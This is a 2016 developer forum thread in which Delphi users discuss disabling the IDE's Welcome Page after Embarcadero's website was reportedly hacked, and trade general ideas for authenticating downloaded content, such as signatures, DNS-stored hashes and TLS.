Given the recent problems with Embarcdero.com's website, have you disabled the Welcome Page within your Delphi IDE? See: http://wiert.me/2016/03/14/delphi-disable-or-change-your-welcome-page-to-not-use-the-embarcadero-site-as-that-site-has-been-hacked-twice-this-weekend/

-
Given the recent problems with Embarcdero.com's website, have you disabled the Welcome Page within your Delphi IDE?  See: http://wiert.me/2016/03/14/delphi-disable-or-change-your-welcome-page-to-not-use-the-embarcadero-site-as-that-site-has-been-hacked-twice-this-weekend/

Comments

  1. David MillingtonMarch 16, 2016 at 1:48 PM

    /sub, interested in the results. I disabled it in response to recent events.

    ReplyDelete
  2. Lars FosdalMarch 16, 2016 at 4:03 PM

    I don't disable it as per se, but since I always work out of the same project group - I simply removed the tab a long time ago.

    ReplyDelete
  3. Rob UttleyMarch 16, 2016 at 5:31 PM

    I normally tend to disable the built-in one and use the Delphi-Praxis one since XE8, I only saw the problem at the weekend because the VM I was playing in is a very recent Seattle install and I hadn't "finished it off" yet.

    Having said that, I tend to use the same 3 or 4 proj files all the time, I don't really make that much use of the screen anyway.

    ReplyDelete
  4. Eli MMarch 16, 2016 at 7:14 PM

    I'd like to see it actually contain community news and/or the GetIt content.

    ReplyDelete
  5. Fred AhrensMarch 17, 2016 at 12:04 AM

    Eli M I'd like to see my IDE wouldn't load any content from the Internet at all without my strict permission.

    ReplyDelete
  6. Carlos LeiteMarch 17, 2016 at 4:25 AM

    never used, just the recent projects page.

    ReplyDelete
  7. David MillingtonMarch 17, 2016 at 5:27 AM

    Eli M Agreed, it could be much more useful. Fred Ahrens Or at least in a sandboxed browser. I've written a welcome screen before, and rather than being a web control, it instead got data from a server (a list of recent forum posts, for example) and validated & displayed that. No Javascript, had validation, hopefully far more secure, still useful.

    ReplyDelete
  8. Jeroen Wiert PluimersMarch 17, 2016 at 7:31 AM

    If it would download anything, only over https. Oh wait. Grade F https...

    ReplyDelete
  9. Darian MillerMarch 17, 2016 at 7:59 AM

    David Millington That's the right path...any content received should be validated before displayed.  I would suggest that they could contract out EldoS Corporation, the makers of SecureBlackbox, to develop a new Welcome Page screen which presents data in a secure manner and the package could be presented with source to demonstrate how it's done right. (One would need SBB components to rebuild the package.) Eldos gets some ongoing advertising, Embarcadero Technologies fixes a large gaping security hole in their product, and the rest of us go back to listening to Bobby McFerrin.  https://www.youtube.com/watch?v=d-diB65scQU

    ReplyDelete
  10. Eli MMarch 17, 2016 at 8:36 AM

    Fred Ahrens Don't use Windows 10 then because the floodgates are wide open.

    ReplyDelete
  11. Darian MillerMarch 17, 2016 at 8:38 AM

    Eli M What do you mean?

    ReplyDelete
  12. Eli MMarch 17, 2016 at 8:41 AM

    Darian Miller http://www.howtogeek.com/224616/30-ways-windows-10-phones-home/

    ReplyDelete
  13. David MillingtonMarch 17, 2016 at 8:55 AM

    Darian Miller Good idea. Suggest it to them? Eli M I installed Win10 when it came out... and it's horrible. Ignoring the privacy concerns, not a nice UI or anything. I'm back on Win7 now and happier than ever.

    ReplyDelete
  14. Darian MillerMarch 17, 2016 at 9:23 AM

    Eli M Ah yes, Win10 issue is mainly sending your data out versus this issue of bringing non-secure, non-validated (and in this case, completely compromised) data in within a browser container that could potentially compromise your system.

    ReplyDelete
  15. Darian MillerMarch 17, 2016 at 9:27 AM

    David Millington Jim forwarded my questions to Brandon Shopp, Senior Director of Product Management, on Tuesday.  When/if he writes me back, I'll make the suggestion directly. Of course, Eldos would have to have time and desire to do it and they'd have to agree on $/licensing/etc.. so it's not a slam dunk.  Maybe someone could put up a GitHub repo with a working welcome page replacement that displays data in a secure fashion...that might be a fun side project to do.  Didn't you write a welcome page already?  : )

    ReplyDelete
  16. David MillingtonMarch 17, 2016 at 9:49 AM

    Darian Miller That was for another product :) There is a welcome page replacement available by Daniel Wolf, which I haven't tried but looks good. https://www.danielwolf.eu/blog/2015/1668-meine-vorstellung-einer-willkommens-seite or https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=https%3A%2F%2Fwww.danielwolf.eu%2Fblog%2F2015%2F1668-meine-vorstellung-einer-willkommens-seite&edit-text=&act=url

    ReplyDelete
  17. EldoSMarch 17, 2016 at 1:38 PM

    Darian Miller thank you for the good challenge. It's not trivial (from security point of view) to decide whether the content is trusted. We need an external trust anchor, and that anchor should be updated as soon as the web page is legitimately updated. Eg. we could store a hash of the web homepage (or any page) in the DNS record and that would make the work of such hijackers harder, but the problem with the DNS is that it's not updated immediately and the person who alters the homepage might have no permission to alter the DNS records. TLS alone won't help either because the certificate's private key is on the web site's server (in most cases) and signing the web page in any way in many cases can be hijacked in the same way as the web page is. Still there are some ideas to think about here.

    ReplyDelete
  18. Darian MillerMarch 17, 2016 at 2:04 PM

    EldoS Corporation You're welcome.. it is definitely a challenge. I will note that it is a little easier when you control both sides of the conversation.  Perhaps a third location is introduced, like a public S3 bucket, that contains signatures for specific content versions. When receiving content, it would contain a specific version which would be cross-referenced with this 3rd location as a workaround for synchronization issues.  Before new content is posted, it's hash/signature is created and updated to the 3rd location while older versions auto expire over time.  It would require a much more complicated intrusion to overcome and yet it seemingly wouldn't be overly burdensome to create/manage.

    ReplyDelete
  19. Eli MMarch 17, 2016 at 5:42 PM

    A simple RSS feed reader would suffice.

    ReplyDelete
  20. Darian MillerMarch 17, 2016 at 7:20 PM

    Eli M No RSS feed reader for me... same exact problem that we just experienced.  The dev machine needs to stay secure.  This should be off by default, and perhaps will be off in the next version.

    ReplyDelete
  21. Jeroen Wiert PluimersMarch 17, 2016 at 11:07 PM

    EldoS Corporation in many of places, TLS is done with off-loading (for instance F5 can do this https://f5.com/glossary/ssl-offloading) so that does not need not be a problem.
    It does warrant an organisation that knows their IT. With the current state of affairs I'm not so sure EMBT knows.

    ReplyDelete
  22. EldoSMarch 18, 2016 at 2:13 AM

    Jeroen Wiert Pluimers When the web site is hacked, we don't know how far the breach has gone. Also, TLS more or less guarantees that the data has not been altered in transit and that you have connected to the intended server. But it doesn't authenticate the data itself. TLS alone won't neither save one from defacing a web side, nor will it prove authenticity of the data.

    ReplyDelete
  23. Jeroen Wiert PluimersMarch 18, 2016 at 7:02 AM

    EldoS Corporation trust me: I know. It's the EMBT people that we need to convince (:

    ReplyDelete

Post a Comment